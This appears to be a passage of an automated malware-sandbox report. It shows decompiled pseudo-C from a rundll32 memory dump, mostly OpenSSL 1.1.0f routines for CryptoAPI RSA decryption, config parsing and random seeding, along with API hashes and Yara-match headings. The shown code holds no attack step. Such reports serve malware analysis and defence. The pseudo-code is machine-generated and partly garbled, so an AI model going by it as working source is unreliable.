                                        				_t59 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				 *(_t87 + 0x4e0) = _t59 ^ _t90;
                                        				_t49 = r8d;
                                        				_t41 = __ecx;
                                        				if (__ecx == 0xffffffff) goto 0xf31119fb;
                                        				0xf310c834();
                                        				r8d = 0x98;
                                        				E0000021E21EF310E410(__ecx, 0, _t49, _t52, _t90 + 0x70, __rdx, _t82, __r8);
                                        				r8d = 0x4d0;
                                        				E0000021E21EF310E410(_t42, 0, _t49, _t52, _t87 + 0x10, __rdx, _t82, __r8);
                                        				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                        				_t62 = _t87 + 0x10;
                                        				 *((long long*)(_t90 + 0x50)) = _t62;
                                        				__imp__RtlCaptureContext();
                                        				r8d = 0;
                                        				__imp__RtlLookupFunctionEntry();
                                        				if (_t62 == 0) goto 0xf3111a8e;
                                        				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                        				 *((long long*)(_t90 + 0x30)) = _t90 + 0x60;
                                        				 *((long long*)(_t90 + 0x28)) = _t90 + 0x58;
                                        				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                        				__imp__RtlVirtualUnwind();
                                        				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                        				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                        				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                        				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                        				 *((intOrPtr*)(_t90 + 0x74)) = _t49;
                                        				_t38 = IsDebuggerPresent();
                                        				SetUnhandledExceptionFilter(_t82, _t86);
                                        				_t40 = UnhandledExceptionFilter(_t96);
                                        				if (_t40 != 0) goto 0xf3111af0;
                                        				if (_t38 != 0) goto 0xf3111af0;
                                        				if (_t41 == 0xffffffff) goto 0xf3111af0;
                                        				0xf310c834();
                                        				E0000021E21EF310C290();
                                        				return _t40;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                        • String ID:
                                        • API String ID: 1239891234-0
                                        • Opcode ID: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction ID: f7b4b9456d200b53331afbd72107542f012ecec24d2d7f45254383d984e72249
                                        • Opcode Fuzzy Hash: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction Fuzzy Hash: F9316732200B8086EF608B25E8843DE77B4F799798F514126EE8D47B99EF38C556CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem
                                        • String ID: ....................$..\..\openssl-1.1.0f\crypto\rand\md_rand.c$You need to read the OpenSSL FAQ, https://www.openssl.org/docs/faq.html$gfff
                                        • API String ID: 2086374402-4054206009
                                        • Opcode ID: c7dcaec6b15934f6ae919af045ae75d685298c7076d44e80fe67b8d19168120d
                                        • Instruction ID: f055cb83be43010cb76718092e9316860954f7a445e4888421438ee308a19dac
                                        • Opcode Fuzzy Hash: c7dcaec6b15934f6ae919af045ae75d685298c7076d44e80fe67b8d19168120d
                                        • Instruction Fuzzy Hash: BED1C17530064086FF549B25ED593EBA3A1BBA4B84F4681269D4A87FB6DF3CC54BCB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 38%
                                        			E0000021E21EF302F8B0(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a24, long long _a32, void* _a56, void* _a72) {
                                        				intOrPtr _t22;
                                        				intOrPtr _t23;
                                        				void* _t25;
                                        				void* _t30;
                                        				void* _t31;
                                        				void* _t41;
                                        				void* _t42;
                                        				void* _t78;
                                        
                                        				_t126 = __r9;
                                        				_t125 = __r8;
                                        				_t121 = __rbp;
                                        				_t119 = __rsi;
                                        				_t104 = __rdx;
                                        				_t79 = __rbx;
                                        				_t78 = __rax;
                                        				_t48 = __ebx;
                                        				_a8 = __rbx;
                                        				_a24 = __rsi;
                                        				E0000021E21EF310C220();
                                        				if ( *0xf31e78c4 >= 0) goto 0xf302fad9;
                                        				_a32 = __rsi;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				_a24 = __rsi;
                                        				_t22 = E0000021E21EF3028570(__ebx, 0, __rax, __rbx, __rdx, __rsi, __rbp, __r8, __r9);
                                        				 *0xf31e78c4 = _t22;
                                        				if (_t22 < 0) goto 0xf302fae3;
                                        				_a32 = __rsi;
                                        				r9d = 0;
                                        				_a24 = __rsi;
                                        				r8d = 0;
                                        				_t23 = E0000021E21EF3028570(__ebx, 0, __rax, _t79, _t104, __rsi, _t121, __r8, __r9);
                                        				r9d = 0;
                                        				_a32 = __rsi;
                                        				r8d = 0;
                                        				 *0xf31e78e0 = _t23;
                                        				_a24 = __rsi;
                                        				 *0xf31e78d8 = E0000021E21EF3028570(__ebx, 0, __rax, _t79, _t104, __rsi, _t121, __r8, __r9);
                                        				_t25 = E0000021E21EF3045D00(_t24);
                                        				_t80 = _t78;
                                        				E0000021E21EF3045EA0(_t25, _t78);
                                        				if (E0000021E21EF3045F70( *0xf3209028, _t78) == 0) goto 0xf302fae3;
                                        				E0000021E21EF3024390(_t27, _t78);
                                        				if (E0000021E21EF3041050( *0xf3209028, _t78) == 0) goto 0xf302fae3;
                                        				_t30 = E0000021E21EF3041080( *0xf3209028, E0000021E21EF3030A10);
                                        				if (_t30 == 0) goto 0xf302fae3;
                                        				0xf3046dd0();
                                        				if (_t30 == 0) goto 0xf302fae3;
                                        				_t31 = E0000021E21EF3075EE0(_t30, _t78);
                                        				0xf303ee30();
                                        				if (_t31 == 0) goto 0xf302fae3;
                                        				E0000021E21EF3035740(_t31, _t80);
                                        				if (E0000021E21EF30357C0( *0xf3209028, _t78) == 0) goto 0xf302fae3;
                                        				if (E0000021E21EF303F280( *0xf3209028, 0xf3030700) == 0) goto 0xf302fae3;
                                        				if (E0000021E21EF3045F80( *0xf3209028, 0xf3030a60) == 0) goto 0xf302fae3;
                                        				_a32 = __rsi;
                                        				r9d = 0;
                                        				_a24 = __rsi;
                                        				r8d = 0;
                                        				 *0xf31e78dc = E0000021E21EF3028570(_t48, 0, _t78, _t80, 0xf3030a60, __rsi, _t121, _t125, _t126);
                                        				E0000021E21EF3046A20(_t36);
                                        				_t81 = _t78;
                                        				if (E0000021E21EF3045F70( *0xf3209030, 0x21ef302e300) == 0) goto 0xf302fae3;
                                        				E0000021E21EF308D460(_t38, _t78);
                                        				if (E0000021E21EF3041080( *0xf3209030, _t78) == 0) goto 0xf302fae3;
                                        				_t41 = E0000021E21EF303F080( *0xf3209030, 0x21ef302e660);
                                        				if (_t41 == 0) goto 0xf302fae3;
                                        				0xf3046d00();
                                        				0xf3046dd0();
                                        				if (_t41 == 0) goto 0xf302fae3;
                                        				_t42 = E0000021E21EF3075EE0(_t41, _t78);
                                        				_t117 = _t78;
                                        				0xf303ee30();
                                        				if (_t42 == 0) goto 0xf302fae3;
                                        				E0000021E21EF302E010(_t42, _t78, _t81, __rsi, _t121);
                                        				if (_t78 != 0) goto 0xf302fb29;
                                        				if ( *0xf3209020 != 0) goto 0xf302faf8;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t78);
                                        				_a24 = 0x1e9;
                                        				_t18 = _t117 - 0x29; // 0x41
                                        				r8d = _t18;
                                        				E0000021E21EF30222D0(_t45, 0x6a,  *0xf3209020, _t78, _t81,  *0xf3209030, _t78, _t119, _t121, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				return 0;
                                        			}


                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCrypt$AcquireRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Microsoft Enhanced RSA and AES Cryptographic Provider
                                        • API String ID: 2306398074-1702151034
                                        • Opcode ID: bf7a6ba508d6a465c244e243e2658b6b54b5c6703a2021ce59ff3648c6eb9b7c
                                        • Instruction ID: a6315a4b55b228a36687c6ca6a81948c1b4a4854fbddd3b9fa49a4cbae2bfb05
                                        • Opcode Fuzzy Hash: bf7a6ba508d6a465c244e243e2658b6b54b5c6703a2021ce59ff3648c6eb9b7c
                                        • Instruction Fuzzy Hash: 83714C74A0474181FF20EB62FD5D7DB67A5A7A4BC4F068026AD4A87EA6EE3CC507C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 45%
                                        			E0000021E21EF3030790(void* __ebx, void* __ecx, char __esi, void* __rax, void* __rdx, long long __rdi, void* __r8, void* __r9, long long __r14, long long _a8, char _a16, char _a24, signed long long _a40, long long _a48, long long _a104, intOrPtr _a128) {
                                        				signed long long _v0;
                                        				void* __rbx;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				signed int _t48;
                                        				void* _t72;
                                        				char _t73;
                                        				void* _t74;
                                        				signed long long _t88;
                                        				signed long long _t89;
                                        				void* _t91;
                                        				void* _t98;
                                        				char* _t107;
                                        				signed int* _t111;
                                        				signed long long _t117;
                                        				void* _t119;
                                        				void* _t120;
                                        				void* _t121;
                                        				char* _t131;
                                        				void* _t136;
                                        
                                        				_t73 = __esi;
                                        				E0000021E21EF310C220();
                                        				_t88 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t89 = _t88 ^ _t121 - __rax;
                                        				_a40 = _t89;
                                        				_t119 = __ecx;
                                        				_t91 = __r9;
                                        				_t136 = __r8;
                                        				_t120 = __rdx;
                                        				if (__ecx > 0) goto 0xf30307c9;
                                        				goto 0xf30309f6;
                                        				_a48 = __r14;
                                        				E0000021E21EF3024390(__esi, __r9);
                                        				E0000021E21EF30311E0(_t89, _t89);
                                        				_t107 = "Called capi_rsa_priv_dec()\n";
                                        				E0000021E21EF302D790(_t89, _t107, __r8, __r9);
                                        				E0000021E21EF303F920(__ecx, _t89, _t91, _t91, __ecx, __rdx);
                                        				if (_t89 != 0) goto 0xf3030845;
                                        				if ( *0xf3209020 != 0) goto 0xf303081e;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t89);
                                        				_v0 = 0x3a3;
                                        				_t4 = _t107 - 9; // 0x65
                                        				r8d = _t4;
                                        				E0000021E21EF30222D0(_t35, 0x6e,  *0xf3209020, _t89, _t91, _t91, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf30309f1;
                                        				r9d = _a128;
                                        				if (r9d == 1) goto 0xf30308bb;
                                        				E0000021E21EF3026420(_t89,  &_a24, _t107, 0xf3145258, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				if ( *0xf3209020 != 0) goto 0xf303087e;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t89);
                                        				_v0 = 0x3aa;
                                        				_t8 = _t107 + 0xa; // 0x78
                                        				r8d = _t8;
                                        				E0000021E21EF30222D0(_t40, 0x6e,  *0xf3209020, _t89, _t91,  &_a24, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF3021640(2, _t89, "padding=",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf30309f1;
                                        				r8d = 0x3b0;
                                        				_a104 = __rdi;
                                        				_t109 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t98 = _t119;
                                        				E0000021E21EF3025700();
                                        				_t117 = _t89;
                                        				if (_t89 != 0) goto 0xf303091c;
                                        				if ( *0xf3209020 != 0) goto 0xf30308f5;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t89);
                                        				_v0 = 0x3b1;
                                        				_t131 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t12 = _t109 - 0x2d; // 0x41
                                        				r8d = _t12;
                                        				E0000021E21EF30222D0(_t45, 0x6e,  *0xf3209020, _t89, _t91, _t98, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t119, _t120, _t131);
                                        				goto 0xf30309e9;
                                        				if (_t73 <= 0) goto 0xf3030942;
                                        				_t111 = _t119 - 1 + _t117;
                                        				_t48 =  *(_t98 + _t120) & 0x000000ff;
                                        				 *_t111 = _t48;
                                        				_t112 = _t111 - 1;
                                        				if (_t98 + 1 - _t119 < 0) goto 0xf3030930;
                                        				r9d = 0;
                                        				_a16 = _t73;
                                        				_a8 =  &_a16;
                                        				_v0 = _t117;
                                        				_t21 = _t131 + 1; // 0x1
                                        				r8d = _t21;
                                        				__imp__CryptDecrypt();
                                        				if (_t48 != 0) goto 0xf30309bf;
                                        				if ( *0xf3209020 != 0) goto 0xf3030981;
                                        				 *0xf3209020 = E0000021E21EF3021CE0( &_a16);
                                        				_v0 = 0x3ba;
                                        				_t23 = _t112 - 5; // 0x69
                                        				r8d = _t23;
                                        				E0000021E21EF30222D0(_t50, 0x6e,  *0xf3209020,  &_a16, _t91,  *((intOrPtr*)(_t89 + 0x10)), _t111 - 1, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302DA10( *0xf3209020,  &_a16, _t111 - 1);
                                        				r8d = 0x3bc;
                                        				E0000021E21EF3025750();
                                        				goto 0xf30309e9;
                                        				E0000021E21EF310DC90(_t50, _t72, _t73, _t74, _t136, _t117, _t117, _t119, _a16);
                                        				r8d = 0x3c1;
                                        				E0000021E21EF3025750();
                                        				E0000021E21EF310C290();
                                        				return __ebx;
                                        			}
























                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Called capi_rsa_priv_dec()$padding=
                                        • API String ID: 0-3671336825
                                        • Opcode ID: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction ID: 96b308cb0a9d7616fcc0704bda1b4b4d23ba4ea307e13ef0f7213ccf9520f099
                                        • Opcode Fuzzy Hash: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction Fuzzy Hash: 1A61BC7530164086FE20DB65EC097EBB3A1F7A9B84F424127AD8A87FA6DB7CC506C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerRecv
                                        • String ID: M'
                                        • API String ID: 195032187-2701432540
                                        • Opcode ID: e6dcab2cf663dec8bff369709bdda2d69aada8583e079ad5373920b1b0be3df2
                                        • Instruction ID: 645336f8229046cc61b629938495caa51603273043c343696affe74f4680b568
                                        • Opcode Fuzzy Hash: e6dcab2cf663dec8bff369709bdda2d69aada8583e079ad5373920b1b0be3df2
                                        • Instruction Fuzzy Hash: 4B315E729086C087EB208F24F84429AB7B0F799794F258219EF8D56E59DF3CC4D58B04
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E0000021E21EF30336A0(void* __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed long long _a8, signed long long _a16, signed long long _a24, long long _a32, void* _a40, char _a48, signed long long _a64, void* _a160) {
                                        				long long _v0;
                                        				intOrPtr _v4;
                                        				intOrPtr _v8;
                                        				intOrPtr _v24;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				signed int _t168;
                                        				void* _t186;
                                        				intOrPtr _t194;
                                        				signed int _t204;
                                        				signed int _t212;
                                        				void* _t234;
                                        				char _t242;
                                        				void* _t297;
                                        				signed long long _t307;
                                        				signed long long _t308;
                                        				char* _t310;
                                        				signed long long _t312;
                                        				void* _t313;
                                        				signed long long _t314;
                                        				signed char* _t317;
                                        				signed char* _t318;
                                        				signed char* _t319;
                                        				signed char* _t320;
                                        				signed long long _t321;
                                        				signed char* _t322;
                                        				signed char* _t323;
                                        				intOrPtr* _t324;
                                        				intOrPtr* _t327;
                                        				signed char* _t329;
                                        				char* _t332;
                                        				signed long long _t341;
                                        				void* _t342;
                                        				void* _t343;
                                        				signed char* _t351;
                                        				signed char* _t352;
                                        				void* _t354;
                                        				void* _t355;
                                        				signed char* _t374;
                                        				signed char* _t378;
                                        				intOrPtr _t383;
                                        				intOrPtr _t384;
                                        				signed long long _t399;
                                        				signed char* _t400;
                                        				signed char* _t401;
                                        				signed char* _t402;
                                        				intOrPtr* _t403;
                                        				void* _t405;
                                        				signed long long _t407;
                                        				void* _t409;
                                        				signed char* _t413;
                                        				void* _t415;
                                        				intOrPtr _t419;
                                        				intOrPtr _t420;
                                        				char* _t426;
                                        				signed char* _t428;
                                        				signed char* _t439;
                                        				long long _t440;
                                        				void* _t441;
                                        				signed long long _t445;
                                        
                                        				_t369 = __rdx;
                                        				_t325 = __rbx;
                                        				_a32 = __rbx;
                                        				E0000021E21EF310C220();
                                        				_t307 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t308 = _t307 ^ _t415 - __rax;
                                        				_a64 = _t308;
                                        				_v8 = 0;
                                        				_t441 = __rcx;
                                        				_v0 =  *((intOrPtr*)(__rcx + 0x10));
                                        				r15d = 0;
                                        				_a40 = __r8;
                                        				_a32 = __rdx;
                                        				E0000021E21EF304DD50(_t234, _t308, _t405, _t409);
                                        				_a8 = _t308;
                                        				if (_t308 != 0) goto 0xf3033722;
                                        				_v24 = 0xb3;
                                        				_t10 = _t325 + 0x79; // 0x79
                                        				_t11 = _t325 + 0xe; // 0xe
                                        				_t12 = _t325 + 7; // 0x7
                                        				r8d = _t12;
                                        				E0000021E21EF30222D0(_t11, _t10, _t308, _t308, __rbx, __rcx, _t369, _t405, _t308, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
                                        				goto 0xf3033c62;
                                        				r8d = 0xb7;
                                        				_t332 = "default";
                                        				E0000021E21EF3025150(_t308, _t332);
                                        				_a16 = _t308;
                                        				_a24 = _t308;
                                        				if (_t308 != 0) goto 0xf3033774;
                                        				_v24 = 0xb9;
                                        				r8d = 0x41;
                                        				_t426 = "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c";
                                        				_t16 = _t332 + 0x6b; // 0x79
                                        				E0000021E21EF30222D0(0xe, _t16, _t308, _t308, _t325, _t332, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c", _t308, _t308, _t426);
                                        				goto 0xf3033c62;
                                        				if (E0000021E21EF30347F0(_t308, _t441) != 0) goto 0xf303378a;
                                        				_v24 = 0xbe;
                                        				goto 0xf3033755;
                                        				0xf3034840();
                                        				if (_t308 != 0) goto 0xf30337ab;
                                        				_v24 = 0xc4;
                                        				_t19 = _t308 + 0x67; // 0x67
                                        				r8d = _t19;
                                        				goto 0xf303375b;
                                        				r12d = 0;
                                        				E0000021E21EF304DA90(_t308, _t325, _t308, _t308);
                                        				if (_t308 == 0) goto 0xf3033d82;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x1ff;
                                        				_t327 = r12d + _a8;
                                        				 *_t327 = 0;
                                        				0xf3022db0();
                                        				 *((char*)(_t327 + 0x1ff)) = 0;
                                        				if ( *_t327 == 0) goto 0xf3033812;
                                        				if (0 - 0x80000000 >= 0) goto 0xf3033812;
                                        				_t310 = _t327 + 1;
                                        				_t242 =  *_t310;
                                        				if (_t242 != 0) goto 0xf3033800;
                                        				r8d = 1;
                                        				if (_t242 != 0) goto 0xf3033825;
                                        				if (0 == 0) goto 0xf3033daa;
                                        				_v4 = 0;
                                        				if (1 == 0) goto 0xf303386f;
                                        				r9d = 1;
                                        				_t374 = _t327 - 1 + _t310;
                                        				_t168 =  *_t374 & 0x000000ff;
                                        				if (_t168 == 0xd) goto 0xf303384c;
                                        				if (_t168 != 0xa) goto 0xf303385b;
                                        				r8d = r8d - 1;
                                        				if (_t426 - _t327 + _t374 - 1 > 0) goto 0xf3033841;
                                        				if (1 == 0) goto 0xf303386f;
                                        				if (r8d != 1) goto 0xf303386f;
                                        				_v4 = 1;
                                        				goto 0xf303387a;
                                        				_v8 = _v8 + 1;
                                        				_t312 = r8d;
                                        				 *((intOrPtr*)(_t312 + _t327)) = dil;
                                        				r12d = r12d + r8d;
                                        				r15d = 0;
                                        				if (r12d - 1 < 0) goto 0xf30338be;
                                        				_t419 =  *((intOrPtr*)(_t441 + 8));
                                        				_t31 = _t440 - 1; // -1
                                        				if (( *(_t419 + _t312 * 2) & 0x00000020) == 0) goto 0xf30338be;
                                        				if (r12d - 1 <= 0) goto 0xf30338b1;
                                        				if (( *(_t419 + _t312 * 2) & 0x00000020) != 0) goto 0xf30338be;
                                        				r12d = _t31;
                                        				goto 0xf3033d62;
                                        				if (1 != 0) goto 0xf3033d62;
                                        				_t399 = _a8;
                                        				r12d = 0;
                                        				E0000021E21EF3033ED0(_t312, _t441, _t399);
                                        				_t420 =  *((intOrPtr*)(_t441 + 8));
                                        				_t313 = _t312 + _t312;
                                        				if (( *(_t420 + _t313) & 0x00000010) == 0) goto 0xf3033908;
                                        				if (( *(_t313 + _t420) & 0x00000008) != 0) goto 0xf3033908;
                                        				_t400 = _t399 + 1;
                                        				_t314 = _t313 + _t313;
                                        				if (( *(_t314 + _t420) & 0x00000010) != 0) goto 0xf30338f0;
                                        				if (( *(_t420 + _t314 * 2) & 0x00000008) != 0) goto 0xf3033d5e;
                                        				if (( *_t400 & 0x000000ff) != 0x5b) goto 0xf3033a57;
                                        				_t401 =  &(_t400[1]);
                                        				if (( *(_t420 + _t314 * 2) & 0x00000010) == 0) goto 0xf3033947;
                                        				if (( *(_t420 + _t314 * 2) & 0x00000008) != 0) goto 0xf3033947;
                                        				_t402 =  &(_t401[1]);
                                        				_t341 = _t420 + _t314 * 2;
                                        				if (( *(_t420 + _t314 * 2) & 0x00000010) != 0) goto 0xf3033930;
                                        				_t428 = _t402;
                                        				asm("o16 nop [eax+eax]");
                                        				if (( *(_t420 + _t341 * 2) & 0x20) == 0) goto 0xf3033987;
                                        				asm("dec eax");
                                        				_t342 = _t341 + 2;
                                        				goto 0xf3033960;
                                        				if ((0x00000307 &  ~( *(_t420 + _t341 * 2) & 8)) == 0) goto 0xf3033991;
                                        				_t317 =  &(( &(_t428[_t342]))[1]);
                                        				goto 0xf3033960;
                                        				_t343 = _t342 + _t342;
                                        				if (( *(_t343 + _t420) & 0x00000010) == 0) goto 0xf30339be;
                                        				if (( *(_t420 + _t343) & 0x00000008) != 0) goto 0xf30339be;
                                        				_t378 =  &(_t317[1]);
                                        				if (( *(_t420 + _t343 + _t343) & 0x00000010) != 0) goto 0xf30339a6;
                                        				_t204 =  *_t378 & 0x000000ff;
                                        				if (_t204 == 0x5d) goto 0xf30339df;
                                        				if (_t204 == 0) goto 0xf3033dd1;
                                        				if (_t428 == _t378) goto 0xf3033dd1;
                                        				goto 0xf3033950;
                                        				 *_t317 = r12b;
                                        				0xf30340b0();
                                        				_t407 = _a24;
                                        				if ((_t401[1] & 0x000000ff) == 0) goto 0xf3033c59;
                                        				_a16 = _t407;
                                        				0xf3034670();
                                        				if (_t317 != 0) goto 0xf3033d5e;
                                        				0xf3034840();
                                        				if (_t317 != 0) goto 0xf3033d5e;
                                        				_v24 = 0x11b;
                                        				_t98 =  &(_t317[0x79]); // 0x79
                                        				_t99 =  &(_t317[0xe]); // 0xe
                                        				_t100 =  &(_t317[0x67]); // 0x67
                                        				r8d = _t100;
                                        				E0000021E21EF30222D0(_t99, _t98, _t317, _t317, _t327, _t441, _t407, _t407, _a8, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
                                        				goto 0xf3033c59;
                                        				E0000021E21EF3034060(_t317, _t441, _t402);
                                        				if ( *_t317 != 0x3a) goto 0xf3033a8b;
                                        				if (_t317[1] != 0x3a) goto 0xf3033a8b;
                                        				 *_t317 = bpl;
                                        				_t102 =  &(_t317[2]); // 0x2
                                        				_t103 =  &(_t317[2]); // 0x2
                                        				_t403 = _t103;
                                        				E0000021E21EF3034060(_t317, _t441, _t102);
                                        				_t439 = _t317;
                                        				_t383 =  *((intOrPtr*)(_t441 + 8));
                                        				_t318 =  &(_t317[_t317]);
                                        				if (( *(_t383 + _t318) & 0x00000010) == 0) goto 0xf3033ab6;
                                        				if (( *(_t383 + _t318) & 0x00000008) != 0) goto 0xf3033ab6;
                                        				_t351 =  &(_t439[1]);
                                        				_t319 =  &(_t318[_t318]);
                                        				if (( *(_t383 + _t319) & 0x00000010) != 0) goto 0xf3033aa0;
                                        				if ( *_t351 != 0x3d) goto 0xf3033e4a;
                                        				_t352 =  &(_t351[1]);
                                        				 *_t439 = r12b;
                                        				_t384 =  *((intOrPtr*)(_t441 + 8));
                                        				_t320 =  &(_t319[_t319]);
                                        				r8d =  *(_t384 + _t320) & 0x0000ffff;
                                        				if ((r8b & 0x00000010) == 0) goto 0xf3033af6;
                                        				if (( *(_t384 + _t320) & 0x00000008) != 0) goto 0xf3033af6;
                                        				_t329 =  &(_t352[1]);
                                        				_t321 =  &(_t320[_t320]);
                                        				if (( *(_t384 + _t321) & 0x00000010) != 0) goto 0xf3033ae0;
                                        				if ((r8b & 0x00000008) != 0) goto 0xf3033b0d;
                                        				if (( *(_t384 + _t321 * 2) & 0x00000008) == 0) goto 0xf3033b00;
                                        				_t354 =  &(_t352[1]) - 1;
                                        				if (_t354 == _t329) goto 0xf3033b26;
                                        				if (( *(_t384 + _t321 * 2) & 0x00000010) == 0) goto 0xf3033b26;
                                        				_t355 = _t354 - 1;
                                        				if (_t355 != _t329) goto 0xf3033b15;
                                        				 *(_t355 + 1) = r12b;
                                        				r8d = 0x13a;
                                        				E0000021E21EF3025700();
                                        				_t445 = _t321;
                                        				if (_t321 == 0) goto 0xf3033e40;
                                        				_t413 =  ==  ? _t407 : _t402;
                                        				if ( *_t403 == 0) goto 0xf3033b72;
                                        				if (0 - 0x80000000 >= 0) goto 0xf3033b72;
                                        				if ( *((intOrPtr*)(_t403 + 1)) != r12b) goto 0xf3033b60;
                                        				asm("btr ecx, 0x1f");
                                        				r8d = 0x140;
                                        				E0000021E21EF3025700();
                                        				 *(_t445 + 8) = _t321;
                                        				 *((long long*)(_t445 + 0x10)) = _t440;
                                        				if (_t321 == 0) goto 0xf3033e16;
                                        				if ( *_t403 == 0) goto 0xf3033bb6;
                                        				if (0 - 0x80000000 >= 0) goto 0xf3033bb6;
                                        				if ( *((intOrPtr*)(_t403 + 1)) != r12b) goto 0xf3033ba4;
                                        				asm("btr ecx, 0x1f");
                                        				_t140 = _t355 + 1; // 0x2
                                        				r8d = _t140;
                                        				_t186 = E0000021E21EF3025650(_t321, _t321, _t403,  &_a24, _t439);
                                        				0xf30340b0();
                                        				_t297 = _t186;
                                        				if (_t297 == 0) goto 0xf3033c54;
                                        				_t322 = _t413;
                                        				r8d =  *_t322 & 0x000000ff;
                                        				_t212 = _t322[_a16 - _t413] & 0x000000ff;
                                        				r8d = r8d - _t212;
                                        				if (_t297 != 0) goto 0xf3033c05;
                                        				_t323 =  &(_t322[1]);
                                        				if (_t212 != 0) goto 0xf3033bf0;
                                        				if (r8d == 0) goto 0xf3033d40;
                                        				0xf3034670();
                                        				if (_t323 != 0) goto 0xf3033d43;
                                        				0xf3034840();
                                        				if (_t323 != 0) goto 0xf3033d43;
                                        				_v24 = 0x150;
                                        				_t145 =  &(_t323[0x79]); // 0x79
                                        				_t146 =  &(_t323[0xe]); // 0xe
                                        				_t147 =  &(_t323[0x67]); // 0x67
                                        				r8d = _t147;
                                        				E0000021E21EF30222D0(_t146, _t145, _t323, _t323, _t329, _t441, _t413, _a16, _t413, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
                                        				_t194 = _v8;
                                        				E0000021E21EF304DA20(_t323, _a8);
                                        				r8d = 0x161;
                                        				E0000021E21EF3025750();
                                        				_t324 = _a40;
                                        				if (_t324 == 0) goto 0xf3033c8b;
                                        				 *_t324 = _t194;
                                        				r9d = _t194;
                                        				E0000021E21EF3026420(_t324,  &_a48, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c", "%ld", "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
